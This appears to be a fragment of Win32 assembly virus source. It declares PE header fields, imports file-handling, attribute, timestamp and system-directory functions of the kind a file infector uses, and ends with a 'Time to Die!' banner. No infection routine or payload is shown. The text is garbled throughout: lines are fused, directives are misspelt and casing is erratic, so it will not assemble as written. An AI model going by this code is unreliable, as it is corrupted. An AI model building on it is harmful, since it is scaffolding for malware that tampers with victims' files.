Var PE_SUBSYSTEM, WORD
Var PE_DLFLAGS, WordVar PE_STACKRESERVESZ, DWORD
Var PE_STACKCOMMITSZ, DWORD
Var PE_HEAPRESERVESZ, DWORD
Var PE_HEAPCOMMITSZ, DWORD
Var PE_LOADERFLAGS, DWORD
Var PE_NUMOFRVAANDSZ, DWORD
Var PE_EXPORTTABLERVA, DWORD
Var PE_EXPORTDATASZ, DWORD
Var PE_IMPORTTABLERVA, DWORD
Var PE_IMPORTDATASZ, DWORD
Var PE_RSRCTABLERVA, DWORD
Var PE_RSRCDataSz, DWORD
Var PE_EXCEPTTABLERVA, DWORD
Var PE_EXCEPTDATASZ, DWORD
Var PE_SecurtableRva, DWORD
VAR PE_SECURDATASZ, DWORD
VAR PE_FIXUPTABLERVA, DWORD
Var PE_FIXUPDataSz, DWORD
Var PE_Debugtables, DWORD
Var PE_Debugdatasz, DWORD
Var PE_IMAGEDESCRVA, DWORD
Var PE_DESCRIPTIONSZ, DWORD
VAR PE_MACHINESPECRVA, DWORD
VAR PE_MACHINPECSZ, DWORD
Var PE_TLSRVA, DWORD
Var PE_TLSSZ, DWORD
Var PE_R0, 30H
Peheadersize = _varaddr-peheaderbegin
IF peheadersize ne 0f8h
.Err 'peheader described incorrectly!'
ENDIF
BreakcoDeline
Stopcode; STOPCODE
VAR VERYLARGEBUFFER, 0H; REST of Memory ;-)
; ------------------------------------------------- ------------
_VARADDR = 0H
Var Convertvar, 4 * 4; Tiny Stack Variables
Var SmallBuffer, 0H; (Memory Buffer)
; ------------------------------------------------- ------------
StartData
Extern MessageBoxa: Proc; External Functions
EXTERN CREATEFILEA: PROC; Which Imported
Extern setFilePointer: Proc; Form Some System
Extern CloseHandle: Proc; DLL'S (Providers
Extern readfile: proc; f this functions
Extern WRITEFILE: PROC
Extern setFilePointer: Proc
Extern getFileAttributesa: Proc
Extern setFileAttributesa: Proc
Extern getFileTime: Proc
Extern setFiletime: Proc
Extern Copyfilea: Proc
Extern movefilea: proc
Extern getENVIRONMENTSTRINGSA: PROC
Extern MessageBeep: Proc
Extern filetimetosystemTime: Proc
Extern SystemTimetOfiletime: Proc
Extern getSystemTime: Procextern getSystemDirectorya: Proc
Stopdata
; ------------------------------------------------- ------------
End Start
; * ================================================= =================== *
; T i m e t o D i e!
; * ================================================= =================== *
